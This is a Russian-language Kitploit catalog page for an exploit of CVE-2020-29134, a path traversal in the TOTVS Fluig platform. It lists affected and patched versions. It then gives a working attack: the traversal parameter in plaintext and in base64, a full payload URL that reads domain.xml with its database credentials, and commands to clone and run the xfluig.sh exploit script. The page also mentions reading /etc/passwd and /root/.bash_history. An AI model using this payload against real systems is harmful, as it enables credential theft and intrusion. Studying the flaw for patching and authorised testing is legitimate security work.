Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2020-29134 — Exploit CVE-2020-29134 - TOTVS Fluig Platform - Path Traversal | Kitploit
Инструменты/GitHubGitHub/ls4ss/cve-2020-29134
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringPenetration Testing
GitHubls4ss/cve-2020-29134

CVE-2020-29134

Exploit CVE-2020-29134 - TOTVS Fluig Platform - Path Traversal

Репозиторий
313 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Платформа Totvs Fluig

root@kitploit:~
 Fluig — это платформа для повышения производительности и совместной работы, которая интегрируется с ERP-системой
 и другими системами вашей компании, чтобы революционизировать то, как вы и ваша команда работаете.

CVE-2020-29134

root@kitploit:~
 Платформа TOTVS Fluig допускает обход пути через параметр, закодированный в base64.
 При эксплуатации эта уязвимость позволяет читать конфиденциальные XML-файлы, которые содержат
 данные для доступа к базе данных и, в некоторых случаях, подключения LDAP и интеграции с ERP-системой.
 Кроме того, также возможно исследовать системные файлы, такие как /etc/passwd и /root/.bash_history
 

Затронутые версии

root@kitploit:~
--
<== Fluig Lake 1.7.0
<== Fluig 1.6.5
<== Fluig 1.6.4
...

Исправленные версии

root@kitploit:~
<== Fluig Lake 1.7.0-210303 (Исправлено)
<== Fluig 1.6.5-210308 (Исправлено)
<== Fluig 1.6.4-210308 (Исправлено)

Создание полезной нагрузки

alt text

Вектор атаки

root@kitploit:~
 http://fluig.host.com/volume/stream/Rmx1aWc=/

Обход пути (простой текст)

root@kitploit:~
 ?t=1&vol=Default&id=1&ver=1000&file=../../../../../../../../../../../../../fluig/appserver/domain/configuration/domain.xml

Обход пути (base64)

root@kitploit:~
 P3Q9MSZ2b2w9RGVmYXVsdCZpZD0xJnZlcj0xMDAwJmZpbGU9Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZmx1aWcvYXBwc2VydmVyL2RvbWFpbi9jb25maWd1cmF0aW9uL2RvbWFpbi54bWw=

Полезная нагрузка

root@kitploit:~
 http://HOST.FLUIG.COM/volume/stream/Rmx1aWc=/P3Q9MSZ2b2w9RGVmYXVsdCZpZD0xJnZlcj0xMDAwJmZpbGU9Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZmx1aWcvYXBwc2VydmVyL2RvbWFpbi9jb25maWd1cmF0aW9uL2RvbWFpbi54bWw=
 

Ссылка Exploit-DB

root@kitploit:~
 https://www.exploit-db.com/exploits/49622

 

Клонирование репозитория

root@kitploit:~
 # git clone https://github.com/lucxssouza/CVE-2020-29134.git
 # cd CVE-2020-29134
 # chmod +x xfluig.sh

Использование

root@kitploit:~
 Пример 1: ./xfluig.sh http://fluig.host.com REQUESTS_WFUZZ (количество запросов, генерируемых wfuzz)

 Пример 2: ./xfluig.sh http://fluig.host.com:PORT
Скачать инструмент